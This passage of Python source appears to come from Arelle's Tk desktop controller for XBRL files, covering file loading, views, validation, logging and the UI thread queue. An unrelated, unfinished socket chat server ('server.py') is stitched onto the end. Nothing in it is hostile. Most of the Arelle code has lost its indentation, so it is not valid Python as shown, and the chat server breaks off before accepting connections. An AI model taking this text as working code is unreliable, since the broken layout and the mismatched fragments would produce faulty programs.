startedAt = time.time()
try:
if importToDTS:
action = _("imported")
profileStat = "import"
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
ModelDocument.load(modelXbrl, filesource.url, isSupplemental=importToDTS)
modelXbrl.relationshipSets.clear() # relationships have to be re-cached
else:
action = _("loaded")
profileStat = "load"
modelXbrl = self.modelManager.load(filesource, _("views loading"),
checkModifiedTime=isHttpUrl(filesource.url)) # check modified time if GUI-loading from web
except ModelDocument.LoadingException:
self.showStatus(_("Loading terminated, unrecoverable error"), 15000)
return
except Exception as err:
msg = _("Exception loading {0}: {1}, at {2}").format(
filesource.url,
err,
traceback.format_tb(sys.exc_info()[2]))
# not sure if message box can be shown from background thread
# tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
            self.addToLog(msg)
self.showStatus(_("Loading terminated, unrecoverable error"), 15000)
return
if modelXbrl and modelXbrl.modelDocument:
statTime = time.time() - startedAt
modelXbrl.profileStat(profileStat, statTime)
self.addToLog(format_string(self.modelManager.locale,
_("%s in %.2f secs"),
(action, statTime)))
if modelXbrl.hasTableRendering:
self.showStatus(_("Initializing table rendering"))
RenderingEvaluator.init(modelXbrl)
self.showStatus(_("{0}, preparing views").format(action))
self.waitForUiThreadQueue() # force status update
self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
else:
self.addToLog(format_string(self.modelManager.locale,
_("not successfully %s in %.2f secs"),
(action, time.time() - startedAt)))
self.showStatus(_("Loading terminated"), 15000)
def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
startedAt = time.time()
currentAction = "setting title"
topView = None
self.currentView = None
try:
if attach:
modelXbrl.closeViews()
self.parent.title(_("arelle - {0}").format(
os.path.basename(modelXbrl.modelDocument.uri)))
self.setValidateTooltipText()
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
currentAction = "tree view of tests"
ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
currentAction = "view of versioning report"
ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
from arelle.ViewWinDiffs import ViewWinDiffs
ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
currentAction = "view of RSS feed"
ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
else:
if modelXbrl.hasTableIndexing:
currentAction = "table index view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
elif modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table index view"
firstTableLinkroleURI, indexLinkroleURI = TableStructure.evaluateTableIndex(modelXbrl, lang=self.labelLang)
if firstTableLinkroleURI is not None:
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang, linkrole=indexLinkroleURI,
treeColHdr="Table Index", showRelationships=False, showColumns=False, expandAll=False, hasTableIndex=True)
'''
elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
not modelXbrl.hasTableRendering):
currentAction = "facttable ELRs view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
'''
currentAction = "tree view of DTS"
ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
currentAction = "view of concepts"
ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
if modelXbrl.hasTableRendering: # show rendering grid even without any facts
ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table view of facts"
if (not modelXbrl.hasTableRendering and # table view only if not grid rendered view
modelXbrl.relationshipSet(XbrlConst.parentChild)): # requires presentation relationships to render this tab
ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, linkrole=firstTableLinkroleURI, lang=self.labelLang, expandAll=firstTableLinkroleURI is not None)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "tree/list of facts"
ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "presentation linkbase view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "calculation linkbase view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "dimensions relationships view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "anchoring relationships view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.widerNarrower, lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasTableRendering:
currentAction = "rendering view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasFormulae:
currentAction = "formulae view"
ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
if topView is None: topView = modelXbrl.views[-1]
for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
if XbrlConst.arcroleGroupDetect in arcroles:
currentAction = name + " view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "property grid"
ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
currentAction = "log view creation time"
viewTime = time.time() - startedAt
modelXbrl.profileStat("view", viewTime)
self.addToLog(format_string(self.modelManager.locale,
_("views %.2f secs"), viewTime))
if selectTopView and topView:
topView.select()
self.currentView = topView
currentAction = "plugin method CntlrWinMain.Xbrl.Loaded"
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
except Exception as err:
msg = _("Exception preparing {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
currentAction = "closing prior formula output instance"
try:
if priorOutputInstance: # if has UI must close on UI thread, not background thread
priorOutputInstance.close()
currentAction = "showing resulting formula output instance"
if currentOutputInstance:
ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
except Exception as err:
msg = _("Exception {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.logProfileStats()
def clearProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.profileStats.clear()
def fileClose(self, *ignore):
if not self.okayToContinue():
return
self.modelManager.close()
self.parent.title(_("arelle - Unnamed"))
self.setValidateTooltipText()
self.currentView = None
def fileReopen(self, *ignore):
self.fileClose()
fileHistory = self.config.setdefault("fileHistory", [])
if len(fileHistory) > 0:
self.fileOpenFile(fileHistory[0])
def validate(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
if (modelXbrl.modelManager.validateDisclosureSystem and
not modelXbrl.modelManager.disclosureSystem.selection):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
parent=self.parent)
else:
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
pluginXbrlMethod(self, None, modelXbrl)
thread = threading.Thread(target=self.backgroundValidate, daemon=True).start()
def backgroundValidate(self):
startedAt = time.time()
modelXbrl = self.modelManager.modelXbrl
priorOutputInstance = modelXbrl.formulaOutputInstance
modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
self.modelManager.validate()
self.addToLog(format_string(self.modelManager.locale,
_("validated in %.2f secs"),
time.time() - startedAt))
if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
self.uiThreadQueue.put((self.logSelect, []))
def compareDTSes(self):
countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
if countLoadedDTSes != 2:
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
parent=self.parent)
return False
versReportFile = self.uiFileDialog("save",
title=_("arelle - Save Versioning Report File"),
initialdir=self.config.setdefault("versioningReportDir","."),
filetypes=[(_("Versioning report file"), "*.xml")],
defaultextension=".xml")
if not versReportFile:
return False
self.config["versioningReportDir"] = os.path.dirname(versReportFile)
self.saveConfig()
thread = threading.Thread(target=self.backgroundCompareDTSes, args=(versReportFile,), daemon=True).start()
def backgroundCompareDTSes(self, versReportFile):
startedAt = time.time()
modelVersReport = self.modelManager.compareDTSes(versReportFile)
if modelVersReport and modelVersReport.modelDocument:
self.addToLog(format_string(self.modelManager.locale,
_("compared in %.2f secs"),
time.time() - startedAt))
self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
def showComparedDTSes(self, modelVersReport):
# close prior DTS displays
modelVersReport.modelDocument.fromDTS.closeViews()
modelVersReport.modelDocument.toDTS.closeViews()
self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
self.filename = filename
self.listBox.delete(0, END)
self.dirty = False
try:
with open(self.filename, "rb") as fh:
self.data = pickle.load(fh)
for name in sorted(self.data, key=str.lower):
self.listBox.insert(END, name)
self.showStatus(_("Loaded {0} items from {1}").format(
                                self.listBox.size(),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to load {0}\n{1}").format(
self.filename,
err),
parent=self.parent)
def quit(self, event=None, restartAfterQuit=False):
if self.okayToContinue():
self.modelManager.close()
logging.shutdown()
global restartMain
restartMain = restartAfterQuit
state = self.parent.state()
if state == "normal":
self.config["windowGeometry"] = self.parent.geometry()
if state in ("normal", "zoomed"):
self.config["windowState"] = state
if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
elif self.isMac: adjustW = 54; adjustH = 39
else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
self.tabWinTopLeft.winfo_height() - adjustH)
super(CntlrWinMain, self).close(saveConfig=True)
self.parent.unbind_all(())
self.parent.destroy()
if self.logFile:
self.logFile.close()
self.logFile = None
def restart(self, event=None):
self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
self.webCache.workOffline = self.workOffline.get()
self.config["workOffline"] = self.webCache.workOffline
self.saveConfig()
def setNoCertificateCheck(self, *args):
self.webCache.noCertificateCheck = self.noCertificateCheck.get() # resets proxy handlers
self.config["noCertificateCheck"] = self.webCache.noCertificateCheck
self.saveConfig()
def confirmClearWebCache(self):
if tkinter.messagebox.askyesno(
_("arelle - Clear Internet Cache"),
_("Are you sure you want to clear the internet cache?"),
parent=self.parent):
def backgroundClearCache():
self.showStatus(_("Clearing internet cache"))
self.webCache.clear()
self.showStatus(_("Internet cache cleared"), 5000)
thread = threading.Thread(target=backgroundClearCache, daemon=True).start()
def manageWebCache(self):
if sys.platform.startswith("win"):
command = 'explorer'
elif sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
subprocess.Popen([command,self.webCache.cacheDir])
except:
pass
def setupProxy(self):
from arelle.DialogUserPassword import askProxy
proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
if proxySettings:
self.webCache.resetProxies(proxySettings)
self.config["proxySettings"] = proxySettings
self.saveConfig()
def setValidateDisclosureSystem(self, *args):
self.modelManager.validateDisclosureSystem = self.validateDisclosureSystem.get()
self.config["validateDisclosureSystem"] = self.modelManager.validateDisclosureSystem
self.saveConfig()
if self.modelManager.validateDisclosureSystem:
if not self.modelManager.disclosureSystem or not self.modelManager.disclosureSystem.selection:
self.selectDisclosureSystem()
self.setValidateTooltipText()
def selectDisclosureSystem(self, *args):
from arelle import DialogOpenArchive
self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
self.saveConfig()
self.setValidateTooltipText()
def formulaParametersDialog(self, *args):
DialogFormulaParameters.getParameters(self)
self.setValidateTooltipText()
def rssWatchOptionsDialog(self, *args):
from arelle import DialogRssWatch
DialogRssWatch.getOptions(self)
# find or open rssWatch view
def rssWatchControl(self, start=False, stop=False, close=False):
from arelle.ModelDocument import Type
from arelle import WatchRss
if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
_("RSS Feed is not set up, please select options and select feed"),
parent=self.parent)
return False
rssModelXbrl = None
for loadedModelXbrl in self.modelManager.loadedModelXbrls:
if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
rssModelXbrl = loadedModelXbrl
break
#not loaded
if start:
if not rssModelXbrl:
rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
self.showLoadedXbrl(rssModelXbrl, False)
if not hasattr(rssModelXbrl,"watchRss"):
WatchRss.initializeWatcher(rssModelXbrl)
rssModelXbrl.watchRss.start()
elif stop:
if rssModelXbrl and rssModelXbrl.watchRss:
rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
self.uiThreadQueue.put((self.uiRssWatchUpdateOption, [latestPubDate]))
    # ui thread rssWatchUpdateOption
def uiRssWatchUpdateOption(self, latestPubDate):
if latestPubDate:
self.modelManager.rssWatchOptions["latestPubDate"] = latestPubDate
self.config["rssWatchOptions"] = self.modelManager.rssWatchOptions
self.saveConfig()
def languagesDialog(self, *args):
override = self.lang if self.lang != self.modelManager.defaultLang else ""
import tkinter.simpledialog
newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
_("The system default language is: {0} \n\n"
"You may override with a different language for labels display. \n\n"
"Current language override code: {1} \n"
"(Leave empty to use the system default language.)").format(
self.modelManager.defaultLang, override),
parent=self.parent)
if newValue is not None:
self.config["labelLangOverride"] = newValue
if newValue:
self.lang = newValue
else:
self.lang = self.modelManager.defaultLang
if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
self.saveConfig()
def setValidateTooltipText(self):
if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
valType = self.modelManager.modelXbrl.modelDocument.type
if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
valName = "DTS"
else:
valName = ModelDocument.Type.typeName[valType]
if valType == ModelDocument.Type.VERSIONINGREPORT:
v = _("Validate versioning report")
else:
if self.modelManager.validateCalcLB:
if self.modelManager.validateInferDecimals:
c = _("\nCheck calculations (infer decimals)")
else:
c = _("\nCheck calculations (infer precision)")
if self.modelManager.validateDedupCalcs:
c += _("\nDeduplicate calculations")
else:
c = ""
if self.modelManager.validateUtr:
u = _("\nCheck unit type registry")
else:
u = ""
if self.modelManager.validateDisclosureSystem:
v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
valName, self.modelManager.disclosureSystem.selection,c,u)
else:
v = _("Validate {0}{1}{2}").format(valName, c, u)
else:
v = _("Validate")
self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
self.modelManager.validateCalcLB = self.validateCalcLB.get()
self.config["validateCalcLB"] = self.modelManager.validateCalcLB
self.saveConfig()
self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
self.modelManager.validateInferDecimals = self.validateInferDecimals.get()
self.config["validateInferDecimals"] = self.modelManager.validateInferDecimals
self.saveConfig()
self.setValidateTooltipText()
def setValidateDedupCalcs(self, *args):
self.modelManager.validateDedupCalcs = self.validateDedupCalcs.get()
self.config["validateDedupCalcs"] = self.modelManager.validateDedupCalcs
self.saveConfig()
self.setValidateTooltipText()
def setValidateUtr(self, *args):
self.modelManager.validateUtr = self.validateUtr.get()
self.config["validateUtr"] = self.modelManager.validateUtr
self.saveConfig()
self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
self.modelManager.collectProfileStats = self.collectProfileStats.get()
self.config["collectProfileStats"] = self.modelManager.collectProfileStats
self.saveConfig()
def setShowDebugMessages(self, *args):
self.config["showDebugMessages"] = self.showDebugMessages.get()
self.saveConfig()
def find(self, *args):
from arelle.DialogFind import find
find(self)
def helpAbout(self, event=None):
from arelle import DialogAbout, Version
from lxml import etree
DialogAbout.about(self.parent,
_("About arelle"),
os.path.join(self.imagesDir, "arelle32.gif"),
_("arelle\u00ae {0} ({1}bit)\n"
"An open source XBRL platform\n"
"\u00a9 2010-{2} Mark V Systems Limited\n"
"All rights reserved\nhttp://www.arelle.org\nsupport@arelle.org\n\n"
"Licensed under the Apache License, Version 2.0 (the \"License\"); "
"you may not use this file except in compliance with the License. "
"You may obtain a copy of the License at\n\n"
"http://www.apache.org/licenses/LICENSE-2.0\n\n"
"Unless required by applicable law or agreed to in writing, software "
"distributed under the License is distributed on an \"AS IS\" BASIS, "
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
"See the License for the specific language governing permissions and "
"limitations under the License."
"\n\nIncludes:"
"\n Python\u00ae {4[0]}.{4[1]}.{4[2]} \u00a9 2001-2016 Python Software Foundation"
"\n Tcl/Tk {6} \u00a9 Univ. of Calif., Sun, Scriptics, ActiveState, and others"
"\n PyParsing \u00a9 2003-2013 Paul T. McGuire"
"\n lxml {5[0]}.{5[1]}.{5[2]} \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
"{3}"
"\n May include installable plug-in modules with author-specific license terms"
)
.format(Version.__version__, self.systemWordSize, Version.copyrightLatestYear,
_("\n Bottle \u00a9 2011-2013 Marcel Hellkamp"
"\n CherryPy \u00a9 2002-2013 CherryPy Team") if self.hasWebServer else "",
sys.version_info, etree.LXML_VERSION, Tcl().eval('info patchlevel')
))
# worker threads addToLog
def addToLog(self, message, messageCode="", messageArgs=None, file="", refs=[], level=logging.INFO):
if level < logging.INFO and not self.showDebugMessages.get():
return # skip DEBUG and INFO-RESULT messages
if messageCode and messageCode not in message: # prepend message code
message = "[{}] {}".format(messageCode, message)
if refs:
message += " - " + Cntlr.logRefsFileLines(refs)
elif file:
if isinstance(file, (tuple,list,set)):
message += " - " + ", ".join(file)
elif isinstance(file, _STR_BASE):
message += " - " + file
if isinstance(messageArgs, dict):
try:
message = message % messageArgs
except (KeyError, TypeError, ValueError) as ex:
message += " \nMessage log error: " + str(ex) + " \nMessage arguments: " + str(messageArgs)
self.uiThreadQueue.put((self.uiAddToLog, [message]))
# ui thread addToLog
def uiAddToLog(self, message):
try:
self.logView.append(message)
except:
pass
def logClear(self, *ignore):
self.logView.clear()
def logSelect(self, *ignore):
self.logView.select()
def logSaveToFile(self, *ignore):
filename = self.uiFileDialog("save",
title=_("arelle - Save Messages Log"),
initialdir=".",
filetypes=[(_("Txt file"), "*.txt")],
defaultextension=".txt")
if not filename:
return False
try:
self.logView.saveToFile(filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
        return True
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
self.waitForUiThreadQueue() # force prior ui view updates if any
self.uiThreadQueue.put((self.uiViewModelObject, [modelXbrl, objectId]))
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
modelXbrl.viewModelObject(objectId)
    # worker threads reloadViews
def reloadViews(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadViews, [modelXbrl]))
    # ui thread reloadViews
def uiReloadViews(self, modelXbrl):
for view in modelXbrl.views:
view.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
self.uiThreadQueue.put((self.uiShowStatus, [message, clearAfter]))
# ui thread showStatus
def uiClearStatusTimerEvent(self):
if self.statusbarTimerId: # if timer still wanted, clear status
self.statusbar["text"] = ""
self.statusbarTimerId = None
def uiShowStatus(self, message, clearAfter=None):
if self.statusbarTimerId: # ignore timer
self.statusbarTimerId = None
self.statusbar["text"] = message
if clearAfter is not None and clearAfter > 0:
self.statusbarTimerId = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
from arelle.DialogUserPassword import askUserPassword
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
untilDone.wait()
return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
from arelle.DialogUserPassword import askInternetLogon
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
untilDone.wait()
return result[0]
def waitForUiThreadQueue(self):
for i in range(40): # max 2 secs
if self.uiThreadQueue.empty():
break
time.sleep(0.05)
def uiThreadChecker(self, widget, delayMsecs=100): # 10x per second
# process callback on main (UI) thread
while not self.uiThreadQueue.empty():
try:
(callback, args) = self.uiThreadQueue.get(block=False)
except queue.Empty:
pass
else:
callback(*args)
widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None):
if parent is None: parent = self.parent
if multiple and action == "open": # return as simple list of file names
multFileNames = tkinter.filedialog.askopenfilename(
multiple=True,
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
if isinstance(multFileNames, (tuple,list)):
return multFileNames
return re.findall("[{]([^}]+)[}]", # older multiple returns "{file1} {file2}..."
multFileNames)
elif self.hasWin32gui:
import win32gui
try:
filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
"save":win32gui.GetSaveFileNameW}[action](
hwndOwner=(owner if owner else parent).winfo_id(),
hInstance=win32gui.GetModuleHandle(None),
Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
MaxFile=4096,
InitialDir=initialdir,
Title=title,
DefExt=defaultextension)
return filename
except win32gui.error:
return ''
else:
return {"open":tkinter.filedialog.askopenfilename,
"save":tkinter.filedialog.asksaveasfilename}[action](
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
from arelle import DialogFormulaParameters
class WinMainLogHandler(logging.Handler):
def __init__(self, cntlr):
super(WinMainLogHandler, self).__init__()
self.cntlr = cntlr
#formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
self.setFormatter(formatter)
self.logRecordBuffer = None
def startLogBuffering(self):
if self.logRecordBuffer is None:
self.logRecordBuffer = []
def endLogBuffering(self):
self.logRecordBuffer = None
def flush(self):
''' Nothing to flush '''
def emit(self, logRecord):
if self.logRecordBuffer is not None:
self.logRecordBuffer.append(logRecord)
# add to logView
msg = self.format(logRecord)
try:
self.cntlr.addToLog(msg, level=logRecord.levelno)
except:
pass
class TkinterCallWrapper:
"""Replacement for internal tkinter class. Stores function to call when some user
defined Tcl function is called e.g. after an event occurred."""
def __init__(self, func, subst, widget):
"""Store FUNC, SUBST and WIDGET as members."""
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
"""Apply first function SUBST to arguments, than FUNC."""
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except SystemExit as msg:
raise SystemExit(msg)
except Exception:
# this was tkinter's standard coding: self.widget._report_exception()
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=30))
tkinter.messagebox.showerror(_("Exception"),
_("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
# this is the entry called by arelleGUI.pyw for windows
if sys.platform == "darwin":
_resourcesDir = Cntlr.resourcesDir()
for _tcltk in ("tcl", "tk"):
for _tcltkVer in ("8.5", "8.6"):
_tcltkDir = os.path.join(_resourcesDir, _tcltk + _tcltkVer)
if os.path.exists(_tcltkDir):
os.environ[_tcltk.upper() + "_LIBRARY"] = _tcltkDir
elif sys.platform == 'win32':
if getattr(sys, 'frozen', False): # windows requires fake stdout/stderr because no write/flush (e.g., EdgarRenderer LocalViewer pybottle)
class dummyFrozenStream:
def __init__(self): pass
def write(self,data): pass
def read(self,data): pass
def flush(self): pass
def close(self): pass
sys.stdout = dummyFrozenStream()
sys.stderr = dummyFrozenStream()
sys.stdin = dummyFrozenStream()
global restartMain
while restartMain:
restartMain = False
try:
application = Tk()
cntlrWinMain = CntlrWinMain(application)
application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
if sys.platform == "darwin" and not __file__.endswith(".app/Contents/MacOS/arelleGUI"):
# not built app - launches behind python or eclipse
application.lift()
application.call('wm', 'attributes', '.', '-topmost', True)
cntlrWinMain.uiThreadQueue.put((application.call, ['wm', 'attributes', '.', '-topmost', False]))
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
application.mainloop()
except Exception: # unable to start Tk or other fatal error
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=7))
logMsg = "{}\nCall Trace\n{}\nEnvironment {}".format(msg, tracebk, os.environ)
print(logMsg, file=sys.stderr)
if syslog is not None:
syslog.openlog("Arelle")
syslog.syslog(syslog.LOG_ALERT, logMsg)
try: # this may crash. Note syslog has 1k message length
logMsg = "tcl_pkgPath {} tcl_library {} tcl version {}".format(
Tcl().getvar("tcl_pkgPath"), Tcl().getvar("tcl_library"), Tcl().eval('info patchlevel'))
if syslog is not None:
syslog.syslog(syslog.LOG_ALERT, logMsg)
print(logMsg, file=sys.stderr)
except:
pass
if syslog is not None:
syslog.closelog()
if __name__ == "__main__":
# this is the entry called by MacOS open and MacOS shell scripts
# check if ARELLE_ARGS are used to emulate command line operation
if os.getenv("ARELLE_ARGS"):
# command line mode
from arelle import CntlrCmdLine
CntlrCmdLine.main()
else:
# GUI mode
main()
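# The uiThreadQueue / uiThreadChecker / waitForUiThreadQueue machinery above follows a
# common Tk rule: worker threads never touch widgets directly, they enqueue
# (callback, args) pairs and a timer on the Tk main loop drains the queue.
# A minimal, self-contained sketch of that pattern (an illustration only, not invoked
# here; it assumes Tk and a display are available):
def _ui_thread_queue_sketch():
    import queue, threading, tkinter
    ui_queue = queue.Queue()
    root = tkinter.Tk()
    label = tkinter.Label(root, text="waiting...")
    label.pack()
    def ui_checker(delay_msecs=100):
        # runs on the Tk main loop: drain any pending callbacks, then re-schedule itself
        while not ui_queue.empty():
            try:
                callback, args = ui_queue.get(block=False)
            except queue.Empty:
                break
            callback(*args)
        root.after(delay_msecs, ui_checker)
    def worker():
        # a background thread posts a UI update instead of calling Tk directly
        ui_queue.put((lambda msg: label.config(text=msg), ("done from worker",)))
    threading.Thread(target=worker, daemon=True).start()
    ui_checker()
    root.after(2000, root.destroy)  # close the demo window after two seconds
    root.mainloop()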
|
server.py
|
import socket
from threading import Thread
# server configuration
listenerSocket = socket.socket()
serverIP = "0.0.0.0"
serverPort = 2222
def kirim_pesan(handlerSocket : socket.socket):
while True:
message = input()
handlerSocket.send(message.encode())
print("server : {}".format(message))
def terima_pesan(handlerSocket : socket.socket):
while True:
message = handlerSocket.recv(1024)
print("client : {}".format(message.decode('utf-8')))
# bind the socket to the IP and port
listenerSocket.bind((serverIP,serverPort))
# the listener socket is ready to accept connections
listenerSocket.listen(0)
